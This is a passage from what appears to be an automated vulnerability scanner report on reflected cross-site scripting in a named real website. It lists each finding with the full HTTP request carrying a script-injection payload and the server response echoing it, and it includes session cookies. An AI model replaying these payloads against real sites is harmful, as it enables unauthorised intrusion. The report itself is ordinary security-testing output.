Date: Wed, 17 Nov 2010 23:13:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/391cfa5<script>alert(1)</script>f9e95d2203c/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2718. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3cd81<script>alert(1)</script>048ef6477b5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes3cd81<script>alert(1)</script>048ef6477b5/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes3cd81<script>alert(1)</script>048ef6477b5/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2719. http://www.resellerbase.com/detail/39/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 34a3f<script>alert(1)</script>36c195c3224 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/search.php34a3f<script>alert(1)</script>36c195c3224?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php34a3f<script>alert(1)</script>36c195c3224?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2720. http://www.resellerbase.com/detail/39/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cfacd<a>d5179e85e85 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Searchcfacd<a>d5179e85e85&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Searchcfacd<a>d5179e85e85&opt=2 was not found on this server.</p>
...[SNIP]...

2.2721. http://www.resellerbase.com/detail/39/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 5b4ed<a>30a6c44bff4 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...5b4ed<a>30a6c44bff4&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...5b4ed<a>30a6c44bff4&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2722. http://www.resellerbase.com/detail/39/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9bb1e<script>alert(1)</script>d573c7949af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2&9bb1e<script>alert(1)</script>d573c7949af=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=2&9bb1e<script>alert(1)</script>d573c7949af=1 was not found on this server.</p>
...[SNIP]...

2.2723. http://www.resellerbase.com/detail/39/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/39/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 21afd<a>989d56fb846 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=221afd<a>989d56fb846 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/39/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/themes/search.php?keyword=search...&Submit3=Search&opt=221afd<a>989d56fb846 was not found on this server.</p>
...[SNIP]...

2.2724. http://www.resellerbase.com/detail/39/webcams-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/webcams-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2dfd8<script>alert(1)</script>3a93148e7f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2dfd8<script>alert(1)</script>3a93148e7f7/39/webcams-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2dfd8<script>alert(1)</script>3a93148e7f7/39/webcams-com.html was not found on this server.</p>
...[SNIP]...

2.2725. http://www.resellerbase.com/detail/39/webcams-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/39/webcams-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3775b<script>alert(1)</script>8f69bbd2bc0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/39/3775b<script>alert(1)</script>8f69bbd2bc0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/39/3775b<script>alert(1)</script>8f69bbd2bc0 was not found on this server.</p>
...[SNIP]...

2.2726. http://www.resellerbase.com/detail/4/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 309d1<script>alert(1)</script>9a73efb917 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail309d1<script>alert(1)</script>9a73efb917/4/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail309d1<script>alert(1)</script>9a73efb917/4/ was not found on this server.</p>
...[SNIP]...

2.2727. http://www.resellerbase.com/detail/4/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 375b8<script>alert(1)</script>5f1e36abee5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4375b8<script>alert(1)</script>5f1e36abee5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4375b8<script>alert(1)</script>5f1e36abee5/ was not found on this server.</p>
...[SNIP]...

2.2728. http://www.resellerbase.com/detail/4/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 88170<script>alert(1)</script>54ab9549905 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/?88170<script>alert(1)</script>54ab9549905=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

2.2729. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 12e64<script>alert(1)</script>4c0a641db0ee5e52e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail12e64<script>alert(1)</script>4c0a641db0ee5e52e/4/rating.php?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail12e64<script>alert(1)</script>4c0a641db0ee5e52e/4/rating.php?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2730. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e048c<script>alert(1)</script>2ab13702f2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile048c<script>alert(1)</script>2ab13702f2b/4/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile048c<script>alert(1)</script>2ab13702f2b/4/rating.php was not found on this server.</p>
...[SNIP]...

2.2731. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7dca4<script>alert(1)</script>e4a7fe80c25d5b085 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/47dca4<script>alert(1)</script>e4a7fe80c25d5b085/rating.php?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/47dca4<script>alert(1)</script>e4a7fe80c25d5b085/rating.php?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2732. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61b70<script>alert(1)</script>0d41909a657 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/461b70<script>alert(1)</script>0d41909a657/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/461b70<script>alert(1)</script>0d41909a657/rating.php was not found on this server.</p>
...[SNIP]...

2.2733. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e9869<script>alert(1)</script>1dae71aeb88298808 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4/rating.phpe9869<script>alert(1)</script>1dae71aeb88298808?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.phpe9869<script>alert(1)</script>1dae71aeb88298808?id=4&rating=5 was not found on this server.</p>
...[SNIP]...

2.2734. http://www.resellerbase.com/detail/4/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ba392<script>alert(1)</script>112874f371f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/rating.phpba392<script>alert(1)</script>112874f371f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.phpba392<script>alert(1)</script>112874f371f was not found on this server.</p>
...[SNIP]...

2.2735. http://www.resellerbase.com/detail/4/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 12cce<script>alert(1)</script>99539ab88ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/rating.php?12cce<script>alert(1)</script>99539ab88ce=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:30:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/rating.php?12cce<script>alert(1)</script>99539ab88ce=1 was not found on this server.</p>
...[SNIP]...

2.2736. http://www.resellerbase.com/detail/4/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/4/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 173d2<script>alert(1)</script>a05e87559374cdfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/4/rating.php/173d2<script>alert(1)</script>a05e87559374cdfba?id=4&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
